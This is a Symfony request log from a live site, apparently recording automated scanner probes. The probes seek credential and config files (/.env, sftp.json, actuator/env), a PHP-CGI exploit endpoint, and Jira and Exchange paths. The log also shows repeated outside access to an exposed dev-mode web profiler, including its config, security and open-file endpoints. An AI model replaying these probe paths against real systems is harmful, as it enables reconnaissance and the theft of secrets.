[2025-12-20 16:11:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:12:17] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-20 16:16:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ba0170","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ba0170?panel=db","method":"GET"} []
[2025-12-20 16:16:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 16:18:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=config","method":"GET"} []
[2025-12-20 16:18:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 16:19:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d0b749","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d0b749?panel=db","method":"GET"} []
[2025-12-20 16:19:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 16:21:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=security","method":"GET"} []
[2025-12-20 16:21:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 16:29:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=form","method":"GET"} []
[2025-12-20 16:29:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 16:30:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:33:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=time","method":"GET"} []
[2025-12-20 16:33:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 16:33:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"23f7f1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/23f7f1?panel=request","method":"GET"} []
[2025-12-20 16:33:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 16:33:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48ebd7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48ebd7?panel=config","method":"GET"} []
[2025-12-20 16:33:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 16:35:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=security","method":"GET"} []
[2025-12-20 16:35:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 16:48:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=twig","method":"GET"} []
[2025-12-20 16:48:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 16:48:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"785c3e","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/785c3e?panel=request","method":"GET"} []
[2025-12-20 16:48:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 16:49:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=router","method":"GET"} []
[2025-12-20 16:49:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 16:56:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=216.106.187.123&limit=10","method":"GET"} []
[2025-12-20 16:56:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10","method":"GET"} []
[2025-12-20 17:01:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=config","method":"GET"} []
[2025-12-20 17:01:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 17:06:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cdn-cgi/trace"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cdn-cgi/trace\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 17:08:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32?panel=request","method":"GET"} []
[2025-12-20 17:08:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 17:12:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=request","method":"GET"} []
[2025-12-20 17:12:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 17:15:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=cache","method":"GET"} []
[2025-12-20 17:15:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 17:16:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"559b7d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/559b7d?panel=swiftmailer","method":"GET"} []
[2025-12-20 17:16:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 17:17:03] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 17:18:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 17:19:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 17:20:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=dump","method":"GET"} []
[2025-12-20 17:20:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 17:22:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=time","method":"GET"} []
[2025-12-20 17:22:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 17:26:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"a9a058","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/a9a058/search/results?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
[2025-12-20 17:26:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
[2025-12-20 17:31:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://www.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FRouting%2FMatcher%2FUrlMatcher.php&line=93","method":"GET"} []
[2025-12-20 17:33:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cb60d4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/cb60d4?panel=logger","method":"GET"} []
[2025-12-20 17:33:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 17:34:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d30e86","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d30e86?panel=router","method":"GET"} []
[2025-12-20 17:34:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 17:34:01] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"d30e86","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/d30e86/router","method":"GET"} []
[2025-12-20 17:34:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=time","method":"GET"} []
[2025-12-20 17:34:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 17:34:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ce7d","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/b9ce7d","method":"GET"} []
[2025-12-20 17:34:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 17:34:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=security","method":"GET"} []
[2025-12-20 17:34:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 17:39:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
